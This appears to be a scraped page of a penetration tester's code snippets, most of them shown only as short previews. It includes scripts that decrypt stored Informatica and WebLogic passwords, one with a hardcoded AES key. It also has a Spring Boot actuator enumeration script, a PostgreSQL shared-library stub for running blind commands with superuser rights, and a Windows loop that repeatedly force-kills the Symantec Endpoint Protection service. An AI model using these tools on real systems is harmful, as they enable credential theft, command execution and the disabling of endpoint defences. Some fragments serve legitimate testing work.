server.xml:
<Realm className="org.apache.catalina.realm.LockOutRealm">
<Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase" digest="sha-256" />
</Realm>tomcat-users.xml (test values from https://www.techpaste.com/2013/05/enable-password-encryption-policy-tomcat-7/):
<tomcat-users xmlns="http://tomcat.apache.org/xml"
| #!/usr/bin/env python3 | |
| import argparse | |
| import base64 | |
| import re | |
| from Cryptodome.Cipher import AES | |
| from Cryptodome.Util.Padding import unpad | |
| parser = argparse.ArgumentParser(description = 'Decrypt Informatica passwords') | |
| parser.add_argument('-k', '--sitekey', type=str, required=True) | |
| parser.add_argument('secret', type=str) |
Need Superuser rights.
Simple SO to run blind commands:
//gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
#include <string.h>
If jconsole doesn't trust the remote server's CA then on Linux it will fail with
Connection failed: error during JRMP connection establishment; nest exception is: java.io.EOFException
On Windows I got this error instead (?):
Connection failed: non-JRMP server at remote endpoint
This is solved by downloading the server's certificate and converting it to a keystore:
true | openssl s_client -connect server.com | openssl x509 > serv.cert
keytool -import -alias serv -keystore serv.jks -file serv.cert
| #!/usr/bin/env python3 | |
| import requests | |
| import sys | |
| import urllib3 | |
| # https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/spring-boot.txt | |
| actuators = [ 'trace', 'health', 'loggers', 'logfile', 'metrics', 'autoconfig', 'heapdump', 'env', 'env/home', 'env/pwd', 'env/lang', 'env/language', 'env/tz', 'env/path', 'env/hostname', 'info', 'dump', 'configprops', 'cloudfoundryapplication', 'features', 'flyway', 'liquibase', 'mappings', 'version', 'auditevents', 'beans', 'gateway/routes', 'actuator', 'actuator/auditLog', 'actuator/auditevents', 'actuator/beans', 'actuator/caches', 'actuator/conditions', 'actuator/configurationMetadata', 'actuator/configprops', 'actuator/dump', 'actuator/env', 'actuator/env/home', 'actuator/env/pwd', 'actuator/env/lang', 'actuator/env/language', 'actuator/env/tz', 'actuator/env/path', 'actuator/env/hostname', 'actuator/events', 'actuator/exportRegisteredServices', 'actuator/features', 'actuator/flyway', 'actuator/gateway/routes', 'actuator/health', 'actu |
| #!/usr/bin/env python3 | |
| import sys | |
| import requests | |
| import re | |
| from packaging import version | |
| # IGNORE SSL WARNING ########################################################### | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
| #!/usr/bin/env python3 | |
| from Cryptodome.Cipher import AES | |
| import base64 | |
| import sys | |
| key = b'Mary had a littl' | |
| data = base64.b64decode(sys.argv[1]) | |
| iv = data[0:4] + b'\x00' * 12 |
| #!/usr/bin/env python3 | |
| # python3 port from https://github.com/L-codes/ctf-scripts/blob/master/crypto/weblogic_password.py | |
| # /console/ login account | |
| # -i ~/wls<VERSION>/user_projects/domains/<DOMAIN_NAME>/security/SerializedSystemIni.dat | |
| # -f ~/wls<VERSION>/user_projects/domains/<DOMAIN_NAME>/config/config.xml | |
| from Cryptodome.Cipher import ARC2, AES, DES3 | |
| from Cryptodome.Hash import SHA | |
| import struct | |
| import re |
./pconfig +get -p <port> -host <host> | grep defaultAccount
As admin launch SymCorpUi.exe and unprotect SEP in options.
for /L %n in (1,0,10) do taskkill /F /IM ccSvcHst.exe & timeout 1